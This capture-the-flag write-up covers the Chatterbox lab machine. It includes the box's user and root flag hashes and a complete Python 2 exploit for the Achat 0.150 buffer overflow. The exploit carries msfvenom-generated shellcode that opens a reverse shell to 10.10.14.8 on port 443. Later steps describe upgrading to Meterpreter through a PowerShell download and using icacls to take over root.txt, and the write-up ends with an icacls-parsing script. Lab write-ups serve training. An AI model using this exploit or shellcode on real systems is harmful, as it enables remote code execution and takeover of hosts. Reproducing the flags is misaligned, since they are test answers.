Chatterbox

Chatterbox - 10.10.10.74

Target Enumeration:

OS: Windows

IP: 10.10.10.74

User: 72290246dfaedb1e3e3ac9d6fb306334

Root: a673d1b1fa95c276c5ef2aa13d9dcc7c

Ports / Services / Software Versions Running

9255/tcp open mon   (nmap-services name only; the listener is Achat)

9256/tcp open -     (Achat; the exploit below sends to UDP 9256)

Vulnerability Exploited:

Achat 0.150 beta7 remote buffer overflow (the chat server listening on 9255/9256).

https://www.exploit-db.com/exploits/36025/

Privilege Escalation:

The current user (alfred) has rights on the Administrator's Desktop directory, so icacls can be used to give alfred access to root.txt even though the file itself is not readable.

Exploiting the host:

Nmap took too long so I used Sparta on this one:

It revealed ports 9255 and 9256 open.

Searching for those port numbers points to Achat.

The Metasploit module for Achat is unreliable, so a standalone exploit from Exploit-DB was used instead:

https://www.exploit-db.com/exploits/36025/

Generate your shellcode with msfvenom. The exact command is reproduced in the comment at the top of the script: the x86/unicode_mixed encoder with BufferRegister=EAX and a bad-character list of NUL plus every byte above 0x7f are required because Achat converts the input to Unicode, so only 7-bit bytes survive the conversion. Set LHOST to your own address; the script uses LPORT 443.

Paste the generated buf into the script so it looks as follows:

#!/usr/bin/python
# Author KAhara MAnhara - modified
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bit
# Python 2 script (print statement, str is bytes): run it with python2.

import socket
import sys, time

# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=443 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytes

buf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x47\x78\x53\x52"
buf += "\x4d\x30\x4d\x30\x59\x70\x43\x30\x45\x39\x6b\x35\x6e"
buf += "\x51\x55\x70\x71\x54\x72\x6b\x72\x30\x6c\x70\x54\x4b"
buf += "\x4f\x62\x7a\x6c\x72\x6b\x42\x32\x6e\x34\x44\x4b\x30"
buf += "\x72\x6b\x78\x6a\x6f\x37\x47\x6d\x7a\x4f\x36\x30\x31"
buf += "\x69\x6f\x66\x4c\x6f\x4c\x51\x51\x51\x6c\x59\x72\x4e"
buf += "\x4c\x6b\x70\x79\x31\x46\x6f\x4c\x4d\x49\x71\x57\x57"
buf += "\x79\x52\x39\x62\x4e\x72\x32\x37\x52\x6b\x30\x52\x4a"
buf += "\x70\x32\x6b\x4e\x6a\x4f\x4c\x72\x6b\x4e\x6c\x4b\x61"
buf += "\x71\x68\x69\x53\x6e\x68\x79\x71\x68\x51\x32\x31\x62"
buf += "\x6b\x50\x59\x6b\x70\x59\x71\x46\x73\x74\x4b\x61\x39"
buf += "\x7a\x78\x5a\x43\x6e\x5a\x6d\x79\x34\x4b\x30\x34\x74"
buf += "\x4b\x49\x71\x57\x66\x30\x31\x49\x6f\x74\x6c\x56\x61"
buf += "\x46\x6f\x6c\x4d\x59\x71\x69\x37\x4e\x58\x67\x70\x70"
buf += "\x75\x69\x66\x49\x73\x53\x4d\x39\x68\x4f\x4b\x71\x6d"
buf += "\x6b\x74\x73\x45\x37\x74\x51\x48\x54\x4b\x6f\x68\x6f"
buf += "\x34\x79\x71\x5a\x33\x32\x46\x44\x4b\x6a\x6c\x30\x4b"
buf += "\x52\x6b\x71\x48\x6d\x4c\x39\x71\x56\x73\x72\x6b\x6c"
buf += "\x44\x32\x6b\x6d\x31\x48\x50\x31\x79\x4d\x74\x6f\x34"
buf += "\x6e\x44\x4f\x6b\x31\x4b\x70\x61\x31\x49\x71\x4a\x52"
buf += "\x31\x6b\x4f\x47\x70\x51\x4f\x71\x4f\x70\x5a\x34\x4b"
buf += "\x4c\x52\x58\x6b\x72\x6d\x4f\x6d\x4f\x78\x30\x33\x50"
buf += "\x32\x79\x70\x69\x70\x53\x38\x52\x57\x73\x43\x50\x32"
buf += "\x31\x4f\x61\x44\x32\x48\x50\x4c\x30\x77\x4f\x36\x7a"
buf += "\x67\x6b\x4f\x36\x75\x36\x58\x62\x70\x49\x71\x59\x70"
buf += "\x49\x70\x6f\x39\x35\x74\x6f\x64\x32\x30\x43\x38\x4b"
buf += "\x79\x63\x50\x30\x6b\x4b\x50\x79\x6f\x48\x55\x42\x30"
buf += "\x70\x50\x42\x30\x42\x30\x51\x30\x62\x30\x61\x30\x6e"
buf += "\x70\x63\x38\x39\x5a\x7a\x6f\x79\x4f\x49\x50\x69\x6f"
buf += "\x78\x55\x45\x47\x32\x4a\x69\x75\x31\x58\x49\x7a\x4a"
buf += "\x6a\x6a\x6e\x6b\x58\x33\x38\x39\x72\x49\x70\x4a\x61"
buf += "\x65\x6b\x72\x69\x49\x56\x70\x6a\x4a\x70\x6f\x66\x51"
buf += "\x47\x70\x68\x44\x59\x46\x45\x53\x44\x43\x31\x59\x6f"
buf += "\x5a\x35\x35\x35\x59\x30\x62\x54\x6a\x6c\x49\x6f\x4e"
buf += "\x6e\x4c\x48\x44\x35\x78\x6c\x43\x38\x78\x70\x74\x75"
buf += "\x65\x52\x42\x36\x79\x6f\x79\x45\x62\x48\x30\x63\x52"
buf += "\x4d\x52\x44\x79\x70\x32\x69\x68\x63\x6f\x67\x4f\x67"
buf += "\x71\x47\x4c\x71\x7a\x56\x42\x4a\x6a\x72\x50\x59\x6e"
buf += "\x76\x49\x52\x4b\x4d\x42\x46\x35\x77\x31\x34\x6c\x64"
buf += "\x4d\x6c\x5a\x61\x6d\x31\x44\x4d\x31\x34\x4e\x44\x4a"
buf += "\x70\x76\x66\x6b\x50\x4e\x64\x51\x44\x30\x50\x6e\x76"
buf += "\x31\x46\x30\x56\x31\x36\x50\x56\x70\x4e\x50\x56\x72"
buf += "\x36\x71\x43\x51\x46\x42\x48\x43\x49\x68\x4c\x4f\x4f"
buf += "\x62\x66\x6b\x4f\x76\x75\x74\x49\x59\x50\x6e\x6e\x62"
buf += "\x36\x51\x36\x59\x6f\x30\x30\x33\x38\x79\x78\x53\x57"
buf += "\x4b\x6d\x51\x50\x4b\x4f\x78\x55\x45\x6b\x4c\x30\x76"
buf += "\x55\x35\x52\x70\x56\x62\x48\x63\x76\x34\x55\x77\x4d"
buf += "\x33\x6d\x49\x6f\x4a\x35\x4d\x6c\x4b\x56\x73\x4c\x7a"
buf += "\x6a\x53\x50\x39\x6b\x79\x50\x71\x65\x7a\x65\x67\x4b"
buf += "\x70\x47\x6d\x43\x62\x52\x32\x4f\x4f\x7a\x69\x70\x42"
buf += "\x33\x4b\x4f\x37\x65\x41\x41"

# Create a UDP socket - change this host to the target. Achat listens on UDP 9256.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

# Stub bytes from the original exploit; leave them as they are.
fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
# Two "A0000000002#Main" messages with the filler sizes the exploit needs.
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40"
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
# Shellcode slot: buf is padded with "A" to 1152 bytes, so it must not exceed that.
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
# Send in 8192-byte datagrams; the original exploit throttles the tail
# (after 172000 bytes) with a one-second sleep between datagrams.
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

Execute it with python2 while a listener is waiting on the LPORT from the msfvenom command (for example nc -lvnp 443).

Now you have a shell as alfred.

Upgrade the shell to Meterpreter. The box is Windows 7, so PowerShell is available to download the payload.

Generate a Meterpreter executable with msfvenom.

Start a Python web server to host it and a Metasploit multi/handler listener.

Download the file onto the box with PowerShell and execute it.

Now you have a Meterpreter session.

Enumerating the system shows that you can access the Administrator's desktop but cannot read root.txt; check the DACLs on the folder and on the file with icacls.

Use icacls to assign ownership of root.txt to alfred (or simply grant alfred read access) and collect the root flag.
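Reading icacls output correctly is the whole privilege escalation here, so as an added example (not from the writeup) the following parses that output and flags the entries that give a given account the rights needed to change a file's contents, DACL or owner, and whether each right is set on the object itself or inherited from its parent. The SAMPLE output and the account name CHATTERBOX\Alfred are constructed for the example, not copied from the box.

```python
#!/usr/bin/env python3
r"""Flag icacls entries that let an account read or rewrite an object.

Added example for this writeup; the SAMPLE output and the account
CHATTERBOX\Alfred are constructed for illustration, not copied from the box.

icacls prints the path, then one ACE per line as IDENTITY:(flag)(flag)...,
with continuation lines indented to the column of the first identity.
Inheritance flags: (OI) object inherit, (CI) container inherit, (IO) inherit
only, (NP) no propagate, (I) inherited from the parent. Rights: (F) full,
(M) modify, (RX) read/execute, (R) read, (W) write, (N) none, or a
comma-separated list of specific rights such as (RC,WDAC,WO).
"""
import re
from dataclasses import dataclass

INHERITANCE = {"OI", "CI", "IO", "NP", "I"}
# Rights that let the holder change the data, the DACL or the owner; (F)
# includes WDAC and WO, (M)/(W) allow writing the contents.
RIGHTS_OF_INTEREST = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}
FLAG_RE = re.compile(r"\(([^)]*)\)")

# Constructed icacls output in the real tool's layout (not the box's actual ACLs).
SAMPLE = r"""
C:\Users\Administrator\Desktop CHATTERBOX\Alfred:(OI)(CI)(F)
                               NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
C:\Users\Administrator\Desktop\root.txt NT AUTHORITY\SYSTEM:(F)
                                        CHATTERBOX\Administrator:(F)

Successfully processed 2 files; Failed processing 0 files
"""


@dataclass(frozen=True)
class Ace:
    identity: str
    inheritance: frozenset
    rights: frozenset
    inherited: bool     # carries (I): comes from the parent, not set on this object
    deny: bool


def parse_ace(token):
    """'CHATTERBOX\\Alfred:(OI)(CI)(F)' -> Ace."""
    identity, _, flags = token.partition(":")
    groups = FLAG_RE.findall(flags)
    if not groups:
        raise ValueError("no flags in %r" % token)
    tokens = {t.strip().upper() for g in groups for t in g.split(",")}
    return Ace(identity=identity.strip(),
               inheritance=frozenset(tokens & INHERITANCE),
               rights=frozenset(tokens - INHERITANCE - {"DENY"}),
               inherited="I" in tokens,
               deny="DENY" in tokens)


def parse_icacls(text):
    """Return [(path, [Ace, ...]), ...] from icacls output."""
    lines = [l for l in text.splitlines()
             if l.strip() and not l.startswith(("Successfully", "Failed"))]
    entries, i = [], 0
    while i < len(lines):
        first = lines[i]
        j = i + 1
        while j < len(lines) and lines[j][0].isspace():   # aligned continuation ACEs
            j += 1
        spaces = [k for k, ch in enumerate(first) if ch == " "]
        if not spaces:                     # path printed with no ACE
            entries.append((first.strip(), []))
            i = j
            continue
        if j > i + 1:
            # the continuation indent tells us where the path ends on the first line
            indent = len(lines[i + 1]) - len(lines[i + 1].lstrip())
            cut = min(spaces, key=lambda k: abs(k - (indent - 1))) + 1
        else:
            cut = spaces[0] + 1            # single ACE: assume a path without spaces
        aces = [parse_ace(first[cut:].strip())] + [parse_ace(l.strip()) for l in lines[i + 1:j]]
        entries.append((first[:cut].rstrip(), aces))
        i = j
    return entries


def writable_by(entries, principals):
    """Yield (path, Ace) for allow-ACEs granting one of `principals` (user or
    group names, case-insensitive) a right from RIGHTS_OF_INTEREST."""
    wanted = {p.lower() for p in principals}
    for path, aces in entries:
        for ace in aces:
            if not ace.deny and ace.identity.lower() in wanted and ace.rights & RIGHTS_OF_INTEREST:
                yield path, ace


if __name__ == "__main__":
    import sys
    who = sys.argv[1:] or ["CHATTERBOX\\Alfred"]
    text = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for path, ace in writable_by(parse_icacls(text), who):
        print("%-45s %-25s %-10s %s" % (path, ace.identity, ",".join(sorted(ace.rights)),
                                        "inherited" if ace.inherited else "explicit"))
```

Run `icacls C:\Users\Administrator\Desktop /T` on the box, paste the output into the script (pass the user and group names from `whoami /groups` as arguments) and look at which objects carry the interesting entries. The writeup's "assign ownership" step corresponds to `icacls root.txt /setowner alfred`; `icacls root.txt /grant alfred:R` is enough to read the flag. Either works only if alfred already holds WRITE_OWNER or WRITE_DAC on root.txt itself (explicitly, by inheritance from the folder's (OI)(CI) entry, or because alfred is the file's owner); `icacls` on the file and `dir /q` on the folder show which applies.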
